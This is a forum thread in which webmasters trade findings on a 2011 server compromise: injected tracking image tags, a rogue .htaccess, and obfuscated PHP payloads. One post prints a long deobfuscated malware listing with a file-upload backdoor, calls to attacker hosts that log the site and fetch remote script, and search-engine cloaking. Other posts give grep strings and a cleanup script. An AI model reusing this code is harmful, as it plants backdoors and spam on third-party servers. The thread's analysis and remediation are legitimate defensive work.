SitePoint Sponsor

User Tag List

Results 1 to 21 of 21
  1. #1
    SitePoint Member
    Join Date
    Mar 2011
    Posts
    2
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    how to remove the virus on my server

    Hi All

    My server is infected by virus I think . It insert a line at the end of code like below but when i check in footer code It does not show but It show in source code.
    Please help me how i can remove it.

    </body>
    </html><img heigth="1" width="1" border="0" src="http://imgaaa.net/t.php?id=8999982">


    <snip/>
    Last edited by Mittineague; Apr 2, 2011 at 19:20. Reason: Don't link to infected sites please

  2. #2
    SitePoint Member
    Join Date
    Mar 2011
    Posts
    2
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    hello anyone for help?

  3. #3
    Community Advisor silver trophy

    Join Date
    Nov 2006
    Location
    UK
    Posts
    2,547
    Mentioned
    40 Post(s)
    Tagged
    1 Thread(s)
    This sort of code injection has been covered many times on this forum before, e.g look at some of these posts. There's plenty information amongst them on likely causes and cures

    http://www.sitepoint.com/forums/sear...archid=4616413

  4. #4
    SitePoint Evangelist
    Join Date
    Mar 2006
    Posts
    466
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    The link is dead. What was the search term?

    Brandon
    Home Recording Forum -
    Make 60% Commission Pushing my new mega system
    Killer Home Recording

  5. #5
    SitePoint Member
    Join Date
    Apr 2011
    Posts
    3
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Same happend to me on all my VPS - here are my findings so far:

    The source seems an infection by a Trojan - probably Wind32/Kryptik - in a first step you will see an injection of the above type in all index.html and index.php. The ID number varies. Look out for less obvious index.* files in subdirectories.

    In a second step (in my case about a day later) the real attack happens:
    you will find files like 42.php or 23.php - allays two digits and a bogus .htaccess - the htaccess looks like this:

    Code:
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule ^(.*)$ /wp-admin/26.php?q=$1 [L]
    </IfModule>
    the malicious 26.php (or whatever number it may have uncompresses binary code:

    Code:
    <? eval(gzuncompress(base64_decode('eNqdWNtuGkkQ/Zm...
    I am only a couple of hours into the investigation of this attack, so all I know is a bit superficial at this point. I am more then happy to exchange thoughts and info about this.

    Cheers

    Sven

    PS: I saw some forums pointing to the lizamoon attack - but so far I have my doubts that this is actually connected.

  6. #6
    Community Advisor silver trophy

    Join Date
    Nov 2006
    Location
    UK
    Posts
    2,547
    Mentioned
    40 Post(s)
    Tagged
    1 Thread(s)
    Do a search for 'gumblar' in all forums

  7. #7
    SitePoint Member
    Join Date
    Apr 2011
    Posts
    3
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by EastCoast View Post
    Do a search for 'gumblar' in all forums
    Excuse me, but from what we are observing we are not dealing with "Gumblar" or a variant. There are similarities but rather remotely.

    What we are seeing is a 2 stage attack:

    stage 1: injection of html code (nothing executable!!) - the code seems to serve only to notify the bad guys of the hacked URL.

    stage 2: about a day later I see uploads of malicious code.

    To me it looks like an exploitation of Win32/Krypitic Trojan. (aka TR/Crypt.XPACK.Gen)

    What bothers me is the missing link - I don't really understand why they do this. If the Trojan sends the username and passwords for FTP access - why do they need to inject a html code to pass an ID-Number? Why don't they inject malicious code right away or FTP it there.

    Did anyone decode the binary code yet?

    Sven

  8. #8
    Community Advisor silver trophy

    Join Date
    Nov 2006
    Location
    UK
    Posts
    2,547
    Mentioned
    40 Post(s)
    Tagged
    1 Thread(s)
    I was answering the OP, not you. The question is how did they manage to inject the code in the first place, this is what matters. The secondary payload, and what it decodes to (as it happens a trivial task) won't close the original point of entry.

  9. #9
    SitePoint Wizard silver trophy Crazybanana's Avatar
    Join Date
    Mar 2003
    Location
    In tha fruit cellar
    Posts
    1,379
    Mentioned
    32 Post(s)
    Tagged
    1 Thread(s)
    now i can't see the code as it is gone... what i can see is that the iframe is linking to another domain and this makes it look similar to some other threats - a trojan has infected a pc - it steals ftp credentials - installs a backdoor/shell - injects a code which links to another domain which tries to exploit a known vulnerability in adobe pdf and/or swf to execute arbitrary code...

    these kind of attacks are poorly detected and quite successfull

    it might be the kryptic or some similar trojan, so clean you puter, your files, your server and change passwords
    Who's to doom when the judge himself is dragged before the bar


  10. #10
    SitePoint Member
    Join Date
    Apr 2011
    Posts
    9
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    A client of mine had the same.

    Do a malware scan and do not use CuteFTP or any other popular FTP program. All those passwords you had are now stolen. Clean your PC and request new FTP passwords for all your sites, and use KeePass to store them

    Here is the diassembled files (n.php) that makes calls to http://bestnetblog.net/logdomain.php?q=alcobro to log the trojan activity.

    Files known to be infected:
    ------------
    n.php
    /.log/ this folder is sometimes created, delete it.
    .htaccess will be overwritten, check it.
    check every index.php .html for the img tag.
    ------------

    Code:
    &lt;?
    
    error_reporting(round(0));
    if (isset(_GET[q]))
    {
        if( !(preg_match("/^([a-z0-9-.)(&=]*)/i", _GET[q])))
        {
            die;
            
        }
        
    }
    
    if (extension_loaded(curl) &&function_exists(curl_init) &&function_exists(curl_exec))
    {
        function l__0(_0)
        {
            _1 =curl_init();
            curl_setopt(_1, 10002, _0);
            curl_setopt(_1, 42, round(0));
            curl_setopt(_1, 19913, round(0+1));
            curl_setopt(_1, 52, round(0+0.25+0.25+0.25+0.25));
            curl_setopt(_1, 13, round(0+6.66666666667+6.66666666667+6.66666666667));
            curl_setopt(_1, 3, round(0+80));
            curl_setopt(_1, 10018, Mozilla/4.0 (compatible;
            MSIE 6.0;
            Windows NT 5.2;
            SV1;
            .NET CLR 2.0.50727;
            InfoPath.1));
            _2 =curl_exec(_1);
            _3 =curl_getinfo(_1, 2097154);
            if (_3 &gt;
            = round(0+200+200)) _2 = false;
            curl_close(_1);
            return _2;
            
        }
        
        
    }
    
    else if(function_exists( file_get_contents))
    {
        function l__0(_0)
        {
            return file_get_contents(_0);
            
        }
        
        
    }
    
    else die( not work);
    _4 =preg_replace( /^www\./, , _SERVER[ HTTP_HOST]);
    @mkdir( .log/);
    @chmod( .log/,round(0+255.5+255.5));
    @mkdir( .log/._4);
    @chmod( .log/._4,round(0+127.75+127.75+127.75+127.75));
    _5 = .log/._4. /xmlrpc.txt;
    if (@fopen(_5, r))
    {
        
    }
    
    else
    {
        _6 =fopen( .log/._4. /xmlrpc.txt, w+);
        fwrite(_6, bestnetblog.net);
        fclose(_6);
        
    }
    
    if ( _GET[ q] == alcobro )
    {
        _5 = .htaccess;
        if (file_exists(_5))
        {
            _7 = disable;
            
        }
        
        else
        {
            _8 = " RewriteEngine On RewriteCond %
            {
                REQUEST_FILENAME
            }
            
            !-f RewriteCond %
            {
                REQUEST_FILENAME
            }
            
            !-d RewriteRule ^(.*) "._SERVER[ SCRIPT_NAME]."?q=1 [L] ";
            _9 =fopen( .htaccess, w+);
            fwrite(_9,_8);
            fclose(_9);
            _7 = enable;
            
        }
        
        curlit =file_get_contents( .log/._4. /xmlrpc.txt);
        _11 = http://.curlit. /logdomain.php?q=._SERVER[ HTTP_HOST];
        _12 = l__0(_11);
        echo _12._7;
        die;
        
    }
    
    if (_GET[ dom100500] != )
    {
        _13 =fopen( .log/._4. /xmlrpc.txt, w+);
        fwrite(_13,_GET[ dom100500]);
        fclose(_13);
        echo 100500ok;
        die;
        
    }
    
    if (_GET[ up100500] != )
    {
        _14 = ;
        _14 = _14 .basename( _FILES[ uploaded][ name]) ;
        _15=round(0+0.5+0.5);
        if(move_uploaded_file(_FILES[ uploaded][ tmp_name], _14))
        {
            echo up100500;
            
        }
        
        echo '&lt;
        form enctype="multipart/form-data" method="POST"&gt;
        &lt;
        input name="uploaded" type="file"&gt;
        &lt;
        input type="submit" value="U"&gt;
        &lt;
        /form&gt;'
        ;
        die;
        
    }
    
    function l__1(_16)
    {
        _4 =preg_replace( /^www\./, , _SERVER[ HTTP_HOST]);
        _17 = isset(_GET[ q]) ?str_replace( /, ,urldecode(_GET[ q])) : FALSE;
        _18 =str_replace( -, +,_17);
        _18 =str_replace( _, +,_17);
        _19 = http://www.google.com/search?hl=en&as_q=._18. &num=100&as_qdr=all;
        _20 = l__0(_19);
        preg_match_all( #&lt;div class="s"&gt;(.*)&lt;br&gt;#U,_20,_21);
        _22=array();
        for (_23=round(0);
        _23&lt;
        ="" _31;
        ="" ++_32)="" _33="_28[_30][_32];
        " this-=""&gt;
        _26[_33][] = _28[_30][_32+round(0+0.2+0.2+0.2+0.2+0.2)];
        
    }
    
    
    }
    
    _34 =array_keys(this-&gt;
    _26);
    foreach (_34 as _17)
    {
        this-&gt;
        _26[_17] =array_unique(this-&gt;
        _26[_17]);
        
    }
    
    
    }
    
    function l__3(_35)
    {
        _36 = round(0);
        for (_30=round(0);
        _36 &lt;
        _35;
        ++_30)
        {
            _37 =array_rand(this-&gt;
            _26);
            _38 =mt_rand(round(0+1.25+1.25+1.25+1.25), round(0+4+4+4));
            for (_32=round(0);
            _32_26[_37][mt_rand(round(0),count(this-&gt;
            _26[_37]) - round(0+0.5+0.5))];
            if (_40 == ) _40 =array_rand(this-&gt;
            _26);
            _37 = _40;
            if (_37 == ) break round(0+0.5+0.5+0.5+0.5);
            
        }
        
        
    }
    
    foreach (_39 as _41)
    {
        _42=count(_41);
        if (_42&lt;
        =round(0+2)) continue;
        if (strlen(_41[_42-round(0+0.5+0.5)]) &lt;
        round(0+0.8+0.8+0.8+0.8+0.8)) unset(_41[_42-round(0+0.333333333333+0.333333333333+0.333333333333)]);
        _41[_42-round(0+2)] =rtrim(_41[_42-round(0+2)], ,:;
        );
        _41[_42-round(0+0.25+0.25+0.25+0.25)] =rtrim(_41[_42-round(0+0.25+0.25+0.25+0.25)], ,:;
        );
        _43 .=ucfirst(implode(  , _41)). . ;
        
    }
    
    _43 =str_replace(  ., ., _43);
    return _43;
    
    }
    
    
    }
    
    _27 = _25;
    _44 = new l__2(_27);
    _45 = _44-&gt;
    l__3(round(0+466.666666667+466.666666667+466.666666667));
    _45 =preg_replace( /[^a-zA-Z\., -]+?/, , _45);
    _46 = isset(_GET[ q]) ?str_replace( /, ,urldecode(_GET[ q])) : FALSE;
    _46=str_replace( -,  ,_46);
    _46=str_replace( _,  ,_46);
    _47 =str_replace (  , +, _46);
    if(_GET[ page] != 1)
    {
        _48 = &start=.(_GET[ page]-round(0+0.5+0.5))*round(0+10.5+10.5);
        
    }
    
    _49 = l__0( http://images.google.com/images?q=._47. &lr=lang_en._48);
    preg_match_all( /href="?\/imgres\?imgurl=([^\&]+)/, _49, _50);
    _51 = array();
    for (_32 = round(0);
    _32 _54 ) break;
    preg_match_all( #^\.log/._4."/(.*).html#i", _58, _59 );
    _57 .= &lt;a href="._53._59[round(0+0.25+0.25+0.25+0.25)][round(0)]. " title=".str_replace( _,  ,str_replace( -,  , _59[round(0+0.5+0.5)][round(0)])). "&gt;.str_replace( _,  ,str_replace( -,  , _59[round(0+0.333333333333+0.333333333333+0.333333333333)][round(0)])). &lt;/a&gt;, ;
    _56++;
    
    }
    
    _60 = l__0( http://clients1.google.com/complete/search?hl=en&ds=i&q= .str_replace(  , %20, _46));
    preg_match_all( |\["([^"]+)",|si, _60, _61, 1);
    _62 = round(0);
    array_shift(_61[round(0+0.2+0.2+0.2+0.2+0.2)]);
    foreach (_61[round(0+0.333333333333+0.333333333333+0.333333333333)] as _63)
    {
        _64 .= &lt;a href='._53.str_replace(  , -, _63). ' title='._63. '&gt; . _63 . &lt;/a&gt;, ;
        if (_62++ &gt;
        round(0+2.75+2.75+2.75+2.75)) break;
        
    }
    
    _65 = _53._GET[ q];
    _66 = &lt;
    _72;
    _32++ )
    {
        if ( (preg_match( /\&lt;
        script/imsU, _73[round(0)][_32]) == round(0)) AND (strlen(_73[round(0)][_32]) &gt;
        _74) )
        {
            _74 =strlen(_73[round(0)][_32]);
            _75 = _32;
            
        }
        
        
    }
    
    _71 =str_ireplace( _73[round(0)][_75], _73[round(0)][_75]. &lt;
    REPLACEME&gt;
    , _71 );
    _76 =fopen( _70, w );
    fputs(_76, _71);
    fclose(_76);
    
    }
    
    _77 = &lt;
    h1&gt;
    .strtoupper(_46)._78. &lt;
    /h1&gt;
    ._64._57. ._69. &lt;p&gt;._66. &lt;/p&gt;;
    return _77;
    
    }
    
    function l__4(_79)
    {
        _4 =preg_replace( /^www\./, , _SERVER[ HTTP_HOST]);
        _80= .log/._4. /._79 . .html._GET[ page];
        if(@file_exists(_80))return@file_get_contents(_80);
        _16=str_replace( -,  ,_79);
        _16=str_replace( +,  ,_79);
        _81=l__1(_16);
        _82=@fopen(_80, w);
        @fwrite(_82,_81);
        @fclose(_82);
        return _81;
        _83=file_get_contents(_80);
        
    }
    
    _84=array( 66.228., 67.195., 68.142., 66.196., 68.180., 72.30., 74.6., 66.94., 66.163., 64.75., 216.32., 66.163., 65.52., 65.53., 65.54., 65.55., 66.249., 66.102., 209.85., 72.14., 74.125., 64.68., 64.233., 216.239., 173.194., 91.184., 94.231., 127.0., 31.43.);
    _85=getenv( REMOTE_ADDR);
    _86=explode( ., _85);
    for (_32=round(0);
    ;
    _32++)
    {
        if(_84[_32]==NULL) break;
        _87=explode( ., _84[_32]);
        if(_87[round(0)]==_86[round(0)]&&_87[round(0+0.333333333333+0.333333333333+0.333333333333)]==_86[round(0+0.333333333333+0.333333333333+0.333333333333)])
        {
            if(_GET[ q]!= )
            {
                _70 = .log/._4. /shab100500.txt;
                if (filesize(_70) &lt;
                round(0+200+200+200+200) )
                {
                    _71 = &lt;
                    head&gt;
                    &lt;
                    title&gt;
                    title&lt;
                    /title&gt;
                    &lt;
                    /head&gt;
                    &lt;
                    body&gt;
                    &lt;
                    REPLACEME&gt;
                    &lt;
                    /body&gt;
                    &lt;
                    /html&gt;
                    ;
                    
                }
                
                else
                {
                    _71 =file_get_contents( _70 );
                    
                }
                
                _88=basename(_GET[ q]);
                _46 = _GET[ q];
                _46=str_replace( -,  ,_46);
                _46=str_replace( .html, ,_46);
                _71 =preg_replace( /&lt;
                title&gt;
                (.*)&lt;
                \/title&gt;
                /imsU, &lt;
                title&gt;
                .ucwords(_46). &lt;
                /title&gt;
                &lt;
                meta name="googlebot" content="noarchive"&gt;
                , _71 );
                _71 =str_ireplace( &lt;
                REPLACEME&gt;
                , l__4(_88), _71 );
                print _71;
                exit;
                
            }
            
            
        }
        
        
    }
    
    if (_GET[ q]!= )
    {
        if (strpos(_SERVER[ HTTP_USER_AGENT], Opera) !== false)
        {
            echo &lt;
            script&gt;
            ;
            include( .log/._4. /iog.txt);
            echo &lt;
            /script&gt;
            ;
            die;
            
        }
        
        if (strpos( _SERVER[ HTTP_REFERER], site% ) &gt;
        round(0) )
        {
            
        }
        
        else
        {
            if (strpos( _SERVER[ HTTP_REFERER], google. ) ||strpos( _SERVER[ HTTP_REFERER], yahoo. ) ||strpos( _SERVER[ HTTP_REFERER], bing. )&gt;
            round(0) )
            {
                _89 = round(0+10+10+10)*round(0+15+15+15+15);
                _90= .log/._4. /iog.txt;
                if(!file_exists(_90)||time()-filemtime(_90)&gt;
                _89)
                {
                    curlit =file_get_contents( .log/._4. /xmlrpc.txt);
                    _91 = http://.curlit. /badcompany.php?q=._4._SERVER[ SCRIPT_NAME];
                    _2 = l__0(_91);
                    _92 =fopen( .log/._4. /iog.txt, w+);
                    fwrite(_92,_2);
                    fclose(_92);
                    
                }
                
                echo &lt;
                script&gt;
                ;
                include( .log/._4. /iog.txt);
                echo &lt;
                /script&gt;
                ;
                die();
                
            }
            
            
        }
        
        
    }
    
    header( Location: http://._SERVER[ HTTP_HOST]);
    
    
    ?&gt;
    Grep:
    ----------------------
    'imgaaa.net/t.php'
    'eval(gzuncompress('
    ----------------------

    Attack log example:
    ----------------------
    91.200.240.10 - - [02/Apr/2011:05:30:48 +0200] "GET /11.php?q=alcobro

    This IP is used to monitor activity, it's probably also hacked.

  11. #11
    SitePoint Member
    Join Date
    Apr 2011
    Posts
    9
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by Sventy View Post
    What bothers me is the missing link - I don't really understand why they do this. If the Trojan sends the username and passwords for FTP access - why do they need to inject a html code to pass an ID-Number? Why don't they inject malicious code right away or FTP it there.

    Did anyone decode the binary code yet?

    Sven
    They seem to do it for SEO scores, that's what I deduct from the disassembly.

  12. #12
    SitePoint Member
    Join Date
    Apr 2011
    Posts
    3
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Anyone came up with a tool that will remove the <img> tags?

    It really sucks doing this manually over all sites/folders....

  13. #13
    SitePoint Member
    Join Date
    Apr 2011
    Posts
    9
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    If you have a editor with find/replace functionalities like dreamweaver, you can RegEx it out. Dreamweaver can replace parts in files in a complete folder, with RegEx functionalities. So it's useful.

    I did this:



    Find:
    ----
    imgaaa.net/t.php\?id=.*?">

    Replace with:
    ------------
    'FOOBAR'

    Then run once again for removal:

    Find:
    -----
    <img heigth="1" width="1" border="0" src="http://FOOBAR

    Replace:
    -------

    //empty nothing.


    Took 10 seconds for a whole server copy with hundreds of files.


    -Goodluck!

  14. #14
    SitePoint Member
    Join Date
    Apr 2011
    Posts
    9
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Okay, I just was in a coding mood and wrote a clean tool for you in PHP. It does work here, just tested it. But you might want to be careful. it's a recursive scanner that deletes the n.php files, and modifies existing files with the image.

    Code:
    <?
    
    $log = "";
    
    function fixgumblar($start_dir){
    
    $file_type = '/(\.php|\.html|\.htm)/';
    
      $dirlist = opendir($start_dir);             
      while ($file = readdir($dirlist)){            
        if ($file != '.' && $file != '..'){          
          $newpath = $start_dir.'/'.$file;           
          if (is_dir($newpath)){                                
            fixgumblar($newpath); 
          } else {                                     
           if (preg_match($file_type, $newpath)){    
    
    			 $fh = fopen($newpath, 'r');            
    			 $inputline = fread($fh, filesize($newpath)); 
    			 fclose($fh);                           
    			 if(stristr($inputline, 'eval(gzuncompress(') !== FALSE) {
    				unlink($newpath); // remove the n files!
    				$log .=  $newpath." REMOVED! \r\n";
    			} else {
    			 	$inputline = preg_replace('/<img heigth="1" width="1" border="0" src="http:\/\/imgaaa.net\/t.php\?id=.*?">/', '', $inputline,-1,$count);
    			}
    		
    		if($count){                             
    		    $fh = fopen($newpath, 'w');           
    			fwrite($fh, $inputline);                   
    			fclose($fh); 
    			$log .=  $newpath." EDITED\r\n";                     
    		}
    	  }                                       
        }
      }
    }
    
      closedir($dirlist);                        
      return true;                                
    }                                              
    
    fixgumblar('./test');  // provide start folder, no trail slash!
    
    echo $log;
    
    
    ?>
    Here are the testfiles which also contain parts of the corrupt files, so please delete after use:

    http://www.easy-share.com/1914559087/try.rar

    alternative download:

    http://www.filedropper.com/try_1

    - Goodluck!

  15. #15
    SitePoint Member
    Join Date
    Apr 2011
    Posts
    9
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Likely cause(s):

    -----------------------------------------------------------------------------------
    c:\WINDOWS\system32\cryptnet32.dll (Trojan.Tracur) -> Delete on reboot.
    c:\documents and settings\administrator\my documents\downloads\messenger.exe (Trojan.Dropper) -> Quarantined and deleted successfully.
    c:\documents and settings\administrator\local settings\temp\yme3iala.exe (Malware.Packer) -> Quarantined and deleted successfully.
    c:\documents and settings\administrator\local settings\temp\_CA.tmp (Trojan.Dropper) -> Quarantined and deleted successfully.
    c:\WINDOWS\system32\crt.dat (Malware.Trace) -> Quarantined and deleted successfully.
    c:\WINDOWS\system32\cryptnet32.dll (Trojan.Tracur) -> Delete on reboot.
    -----------------------------------------------------------------------------------

  16. #16
    SitePoint Member
    Join Date
    Apr 2011
    Posts
    9
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Since last week more reports are dripping in from more clients, so beware we might have zeroday on our hands. Our systems and our client systems are updated every single day. Suggestion: disable Java, Flash and disable scripting in PDF readers.

    Additional info for (future) reference:
    -----------------------------------

    c:\WINDOWS\system32\dll.dll <- might be infected too, based on further reports.

    Propagation evidence
    --------------------

    Due to one of the following issues in respective order:

    1. - Malicious PDF file (likely: found trojanized PDF on client PC)
    2. - Java Applet (likely: found corrupt web cache with malware packer )
    3. - Flash exploit (not likely, possible yet.)
    4. - Media file (wmv, codec, not likely.)

  17. #17
    SitePoint Member
    Join Date
    Apr 2011
    Posts
    1
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    We had this appear on our client servers yesterday too. the imgaa.net -link was added to a few files (also a functions.php -file under Wordpress, so this is not limited to just index.php).

    The FTP log showed that the file was uploaded from an IP tracked to India.

    We are still in the process of trying to find out how many sites were affected and what was the entry point. All computers related are being scanned.

    Anyone got any more info on this vulnerability / point of entry? Even Google can't seem to find any thread anywhere with conclusive data, just a ton of threads and pages from the last week or so describing the problem around the web.

    It doesn't really help to just fix the servers if we still have a trojan / keylogger roaming free somewhere.

  18. #18
    SitePoint Member
    Join Date
    Apr 2011
    Posts
    9
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I diassasembled the code, had a look at all date changes on files and nothing else besides the above is modified/added. If it is, you might have another verion of it, or something completely different.

    The complete diassasembled code: #1794541 - Pastie

  19. #19
    SitePoint Member
    Join Date
    Apr 2011
    Posts
    1
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Hi..

    Special thanks for "unknownimous" ur good.This big maleware script the same problem in my clients site.i was trying decode this code but i am unsuccess and thanks for ur solutions for this maleware.can u tell me how to decode this code?? it's very interesting part

    hxxp://malsite1 and hxxp://malsite2 it's sister site and making high traffic through Google they are tarting high traffic site and hack then upload virus code.whenever visitor search query for ur relevant keyword site to goolge showing ur site result that time this script chaining search string what they need and they make big traffic.

    Please tell me how to decode this code

    my id : <snip/>
    Last edited by Mittineague; Apr 27, 2011 at 12:56. Reason: Please keep personal info private

  20. #20
    SitePoint Member
    Join Date
    Apr 2011
    Posts
    9
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I'm glad to help out, and hope it will be useful since I know what a massive pain it can be once such attack happened.

    I dissasembled it by using var_dump($code) in php then looking at the arrays and run a replacement function then another round of var_dump() untill you get what's above. It can also be automated though a 'PHP Bytecode Disassembler'. Somehwere on Google for download.

  21. #21
    SitePoint Member
    Join Date
    Apr 2011
    Posts
    1
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    A couple of weeks ago I came across this line of code on my girlfriend's Mom's Web site: <img heigth="1" width="1" border="0" src="http://imgaaa.net/t.php?id=10482688">

    I wasn't looking for anything malicious, but it stood out so I started digging into it, and ultimately found this thread. She asked me to clean it up for her so this week I took a look at it. The stuff I found was in line with what others found, but there were a couple of additions as well.

    Note: I'm not a coder or Web designer, I'm a Cisco guy. If any of what I say seems basic then forgive me; I hope what I found might add to the discussion.

    The first modification to the site was the addition of "<img heigth="1" width="1" border="0" src="http://imgaaa.net/t.php?id=10482688">" at the bottom of the /index.php page.

    One day later, two more modifications were made:

    1. The .htaccess file was modified (thanks to Sventy's post for cluing me into looking for that). The file was also hidden so it did not show up when I was looking at the file modification dates. I am not sure if that is normal for this server or if it was modified during the attack.

    2. Files 43.php and 95.php were added. They contained compressed binary code, as outlined in other posts.

    Then, within a seven day window, one other file was modified and one was added.

    First, an index.html file in a sub-directory was modified to include this script: #1851387 - Pastie (NOTE: Your anti-virus may go crazy viewing that link; if you're worried about it then you can view a screenshot of it here: ImageShack® - Online Photo and Video Hosting.)

    There were two other things in that same file that I think were probably additions, but I can't know for sure since I didn't have the original to compare against. They didn't look right so I removed them. They are both shown in this pastie: #1851393 - Pastie

    The last change was that a file named hxyn.php was uploaded to the root of the Web site. This file was the "Web Shell by oRB" script. Again, I'm not a coder, but from what I can tell this file is designed to check for vulnerabilities or security flaws on the web server (.htpasswd, config files, admin files, etc). You can view it here: #1851432 - Pastie

    One thing to note about hxyn.php is that is that it contains some mechanism to keep you from viewing it on the Web server using nano or vi (at least I couldn't view it on this particular server, which is Debian based). The file is easily viewable once you download it and open it in a local editor. I am assuming this is to keep it from being found through grep, etc.

    Recommendations:

    1. Change your FTP passwords. That goes without saying.
    2. IMMEDIATELY change the passwords to any other accounts that used the same password as your FTP/SSH/Telnet, ESPECIALLY if they are email or banking accounts. The best thing to do is just assume all of your passwords or your client's passwords were compromised.
    3. Look for any files that were modified OR ADDED after the attack. Remember that restoring from a backup will not necessarily remove added files. This particular attack starts with the imgaaa line of code, so if you can identify when that line was added to a page then you have a nice baseline of when to start looking for changes.
    4. Don't forget directories and hidden files. Filezilla contains a nice feature that will try to show hidden files. Remember to turn it on.
    5. Download the Web site (unzipped) to a Windows PC that has good malware protection. Check the logs of your anti-malware products to see if they detected anything unusual in the files.
    6. Don't forget to look for scripts or anything else unusual that may have been added.

    Unfortunately I have the feeling that my girlfriend's Mom's site may have been compromised in more ways than what I saw. If anyone else has any suggestions on what to look for then I'd appreciate it. It was coded from scratch so it is not based on WP or Joomla or anything like that, and it is written in a combination of html and php.


Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •